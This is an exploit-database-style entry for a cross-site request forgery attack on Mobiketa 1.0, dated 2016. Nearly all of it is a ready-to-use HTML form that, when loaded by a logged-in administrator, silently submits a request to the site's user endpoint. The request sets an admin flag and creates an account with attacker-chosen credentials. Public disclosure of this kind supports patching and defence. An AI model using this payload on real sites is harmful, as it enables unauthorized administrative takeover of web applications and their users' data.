<!-- # Exploit Title: Mobiketa - CSRF Add Admin Exploit # Date: 09/06/2016 # Exploit Author: Murat YILMAZLAR # Vendor Homepage: http://www.ynetinteractive.com/mobiketa/ # Version: 1.0 # Exploit: < -- bug code started -- > --> <html> <body> <form action="[SITE]/[mobiketa_path]/index.php?url=user" method="POST" enctype="multipart/form-data"> <input type="hidden" name="is&#95;admin" value="1" /> <input type="hidden" name="name" value="murat&#32;y" /> <input type="hidden" name="email" value="murrat&#64;protonmail&#46;com" /> <input type="hidden" name="username" value="murrat" /> <input type="hidden" name="password" value="123123123" /> <input type="hidden" name="id" value="15" /> <input type="hidden" name="update" value="&#13;" /> <input type="submit" value="Submit request" /> </form> </body> </html> <!-- < -- end of the bug code -- > ######################### [+] Contact: http://twitter.com/muratyilmazlarr -->